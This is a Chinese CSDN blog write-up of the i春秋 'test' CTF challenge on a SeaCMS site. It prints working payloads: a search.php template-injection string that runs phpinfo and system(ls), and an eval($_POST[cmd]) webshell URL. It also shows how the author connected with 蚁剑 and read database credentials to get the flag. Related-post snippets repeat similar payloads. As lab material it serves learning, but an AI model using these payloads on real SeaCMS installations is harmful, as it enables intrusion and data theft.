i春秋 WEB test

最新推荐文章于 2019-10-15 08:58:45 发布
最新推荐文章于 2019-10-15 08:58:45 发布
阅读量457 收藏 1
点赞数
分类专栏: CTF题 一天一道CTF i春秋CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42967398/article/details/91463626
版权
CTF题 同时被 3 个专栏收录
115 篇文章 16 订阅
订阅专栏
一天一道CTF
52 篇文章 6 订阅
订阅专栏
i春秋CTF
21 篇文章 2 订阅
订阅专栏

i春秋 WEB test

一天一道CTF题目,能多不能少

打开网页发现是一个海洋cms搭建的平台,然后根据提示:
在这里插入图片描述
十有八九是查找海洋cms的漏洞,那就直接百度吧!!
找到以下几个:
海洋CMS V6.28 命令执行 0DAY
Seacms v6.45 漏洞复现
海洋cms v6.53 v6.54版本漏洞复现
要么是命令执行,要么是getshell
先测试命令执行:

searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))&9[]=ph&9[]=pinfo();

发现存在命令执行:
在这里插入图片描述
继续执行代码:

searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))&9[]=&9[]=system(ls);

得到目录:
在这里插入图片描述
不过好像没有找到flag,,,,
猜测flag是不是存在于数据库中
这样的话漏洞就不是这个了,就是getshell了
换一个getshell漏洞
构造payload:

http://3d457c94b92d40568cd5c76a33a91d218caff86ffef948b7.changame.ichunqiu.com/search.php?searchtype=5&tid=&area=eval($_POST[cmd])

连接并且找到数据库的配置文件,如下:
在这里插入图片描述
然后直接配置:

<T>MYSQL</T>
<H>127.0.0.1</H>
<U>sea_user</U>
<P>46e06533407e</P>
<N>seacms</N>

意思分别是:

数据库类型
连接地址
数据库用户名
数据库密码
连接的数据库

但是!!!!我用菜刀一直连接不上!!
最后下载换了蚁剑才成功的!
(蚁剑如果有需要的话可以说一下,这里就不贴下载地址了,或者自己百度也可以下载)
成功连接到数据库,找到flag:
在这里插入图片描述

A_dmins
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
i春秋 “百度杯”CTF比赛 九月场 Test
include_heqile的博客
09-17 1013
https://www.ichunqiu.com/battalion?t=1&amp;amp;amp;amp;r=0 这道题还是蛮不错的,下面我来说一下解题思路 首先进入题目链接,然后搜索seacms相关漏洞,我直接使用了百度出来的第一条,freebuf上的一篇文章: http://www.freebuf.com/vuls/150042.html 漏洞利用方式如下: 我们把eval改成system,把9[]...
“百度杯”CTF比赛 九月场--Web--Test--Seacms海洋漏洞
残阳泼茶香的博客
04-30 1936
Web题目名称:Test 题目内容: 善于查资料,你就可以拿一血了。 给了我们一个链接 打开就是海洋cms的模板,通过 查百度发现海洋的一个search.php漏洞 Seacms漏洞分析利用复现 By Assassin ichunqiu 通过这两个 复现漏洞(注意 这里 get post 都可以) http://53290ec71e554551a257d1a5ce00ab1...
Web-Test[i春秋][50pt]
Laurel_60的博客
08-02 511
链接打开之后是一个海洋cms的网站。 emmm那我们就在网上搜一下海洋cms的漏洞。会搜索到有一个漏洞是- - /search.php?searchtype=5&amp;amp;tid=&amp;amp;area=eval($_POST[1]) 那就拿菜刀连上去。 看到这么多的文件夹,果断百度一下海洋的数据库配置文件的存储位置- - /data/common.inc.php 于是看到了...
i春秋Test
weixin_30555515的博客
08-05 207
点开是个莫名其妙的网站。。。看看源码, 第一排好像有点东西 最后也有点东西,所以我们直接百度海洋CMS漏洞(https://www.freebuf.com/vuls/150042.html) 所以这里直接在url中试试search.php 告诉我们需要有关键字,原来这里是进行关键字攻击的 构造url后缀:/search.php?searchtype=5&tid...
暑期练习web13:web test(i春秋)百度杯 九月场
qq_41618162的博客
08-19 281
头一回做这样的题啊,感觉特新鲜! 这次题目一打开居然是一个比较成型的网页了,源码也复杂到你根本不会去看 题目的hint是让我们善于搜索。。所以我就最后就搜出几篇wp来看看了。。。。 翻翻这个页面可以知道一个关键词:海洋cms 于是感觉去百度这个东西,发现它是一个具有许多漏洞的cms,这也是他会被选为靶机的原因吧。。现在我们一头雾水根本不知道这是什么玩意,知道我看到了一个可以前台gets...
WebTest.rar
04-27
【标题】"WebTest.rar" 是一个压缩文件,通常用于存储和传输与Web测试相关的资料。Web测试是软件测试的一个重要领域,主要针对基于Web的应用程序进行,目的是确保其功能、性能、安全性等方面达到预期标准。 【描述...
WebTest-开源
06-29
WebTest 开源详解】 WebTest,正如其名,是一个专为 Web 应用测试而设计的开源工具。它能够并行发送多个 HTTP 请求,帮助开发者和测试人员高效地检查和验证 Web 服务的响应。这个强大的工具适用于任何支持 Java ...
webtest压力测试软件
02-02
WebTest压力测试软件是一款专为Web应用程序设计的性能和负载测试工具。它允许用户模拟大量并发用户对网站或Web服务进行访问,以检测系统在高负载情况下的性能、稳定性及可扩展性。通过WebTest,我们可以发现潜在的...
WEB 练手 TEST TEST TEST
07-01
"WEB 练手 TEST TEST TEST"这个标题可能指的是一个练习项目或教程,旨在帮助用户提升Web开发技能。这里我们将深入探讨Web开发的重要知识点,结合"web"这一标签,我们将主要关注前端和后端的开发技术。 前端开发是...
webtest_报告
07-06
Webtest_报告是一个专门针对Web测试的文档,它提供了关于测试过程、结果和分析的详细信息。这个报告对于开发团队、测试团队以及项目管理者来说都极其重要,因为它能够帮助他们理解系统的表现、找出潜在问题并制定...
Seacms漏洞分析利用复现 By Assassin
Assassin
08-03 9736
碰到了cms,之前一直没有真正的分析过,趁着没事干准备复现一个seacms的漏洞复现,但是经过一系列的苦痛挣扎发现—–搭个环境神特么难…一开始我想用ubuntu直接搭建,但是我用的是php7,而各大seacms的安装指南上说…===必读提示=== ------------------------------------- 【1】自适应模板不支持IE6/7/8古董浏览器,会发生错误。国内双核浏览器的兼
ICHUNQIU TEST 海洋CMS6.26命令执行
sssvvf的博客
10-15 521
网站标题:海洋CMS 在DATA/ADMIN/VER.TXT中查看到海洋CMS的版本 V6.26 https://blog.csdn.net/fsdzsec/article/details/53132362 找到个海洋CMS6.28的命令执行 菜刀链接后在DATA目录下找到数据库配置文件 <?php //鏁版嵁搴撹繛鎺ヤ俊鎭? $cfg_dbhost = '127.0.0.1'; $cfg_...
i春秋 WEB 象棋
A_dmin的博客
06-17 1262
i春秋 WEB 象棋 一天一道CTF题目,能多不能少 打开页面,一副象棋映入眼帘,玩了一会,,,太菜了,打不过人机,,,: 打开网页源代码,仔细查看一番,发现有一处CTF的字样~~: 这个正则表达式嘛,第一反应是爆破这个文件叫什么名字,因为实在找不到还有啥地方不对了 (直接访问肯定是么得的,不信的可以去试试) 上脚本: import requests import base64 import ...
i春秋在线挑战详细攻略-《你是会员吗》
wodafa的博客
03-15 5067
试验地址:http://www.ichunqiu.com/racing/54399 实验平台:i春秋 Step 0 实验环境 操作机:Windows XP [172.16.11.2] 目标网址:www.test.ichunqiu  [172.16.12.2] 实验工具:中国菜刀 实验目标:获取www.test.ichunqiu网站的FLAG信息,学习一些简单的提权方式
i春秋web-Test(海洋CMS漏洞)
Sea_Sand息禅
05-22 1373
前面部分参考https://blog.csdn.net/zz_Caleb/article/details/88244046 以前做过一个漏洞的复现,下面只介绍连接上之后的操作。 这里用的是中国蚁剑进行的连接。 这里找到数据库的配置文件,其内容如下: 按照上面给出的数据库信息利用蚁剑来进行数据库的操作: 连接上之后执行查找命令即可: ...
i春秋 “百度杯”CTF比赛 十月场 Gift
include_heqile的博客
10-24 2476
https://www.ichunqiu.com/battalion?t=1&amp;amp;amp;amp;amp;r=0 进入题目链接,是一张黑人问号图片: 直接使用burp suite抓包送到Repeater模块,检查发送和相应报文的HTTP头部字段,并未发现可疑字段,图片是base64编码,点击href链接,依然还是刚的页面,尝试更改请求方法,将GET更改为POST,响应如下: 如果了解过Django的话应该很容易看...
i春秋:警惕您站上的文件内容检测绕过类上传漏洞
MyBack
06-01 4009
实验环境 实验环境 操作机:Windows XP 目标机:Windows 2003 目标网址:www.test.com实验工具:中国菜刀 BurpSuite 实验目的 本课程带领大家学习利用修改文件内容,绕过上传验证,获取WebShell。通过亲身实验,验证绕过上传验证的可行性,从而提高自身的安全防御意识。 实验思路 上传正常图片和一句
i春秋象棋
weixin_30701575的博客
09-04 357
这是一道非常有意思的一道题,打开后就是一个pve的象棋游戏,我觉得下赢了就应该会出现flag,可惜多次尝试后失败了(果真有点厉害,我一时兴起就玩了好几把,有空试试拿更厉害的电脑跟他对下,如果赢了会怎么样) 不说象棋游戏了,我们来做这道题,首先是不可能通过下赢来获取flag的,他会自动挑战大师水平,尽管我选的新手。。。。(我菜) 让另一个电脑大师级的和他对下,终于...
【i春秋综合渗透训练】我很简单,请不要欺负我
A_dmin的博客
09-23 1712
【i春秋综合渗透训练】我很简单,请不要欺负我
web resolution test插件
最新发布
08-31
Web Resolution Test插件是一种用于测试网页在不同分辨率下的显示效果的工具。它可以帮助开发人员和设计师在开发和设计网页时,快速了解网页在不同终端设备上的显示情况,从而做出相应的优化。 该插件具有简单易用的特点,安装后可以通过简单的操作来切换不同的分辨率。用户只需点击插件图标,选择所需的分辨率,即可实时预览网页在该分辨率下的显示效果。 这对于开发响应式或自适应网页设计非常有帮助。通过使用该插件,开发人员能够模拟不同设备上的显示效果,比如手机、平板电脑和桌面电脑等。他们可以实时观察到网页在不同分辨率下的布局、字体大小和图片等的表现情况,从而进行必要的调整。 此外,Web Resolution Test插件还可以检测响应式网页的断点,即网页从一个分辨率到另一个分辨率时的自动适应情况。这使得开发人员能够更好地了解网页在不同分辨率上的布局变化,并对其进行优化以确保用户在不同设备上都获得良好的浏览体验。 总结起来,Web Resolution Test插件是一款实用的工具,能够帮助开发人员和设计师快速测试网页在不同分辨率下的显示效果,从而进行相应的优化和调整,以提升用户体验并适应不同终端设备的要求。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值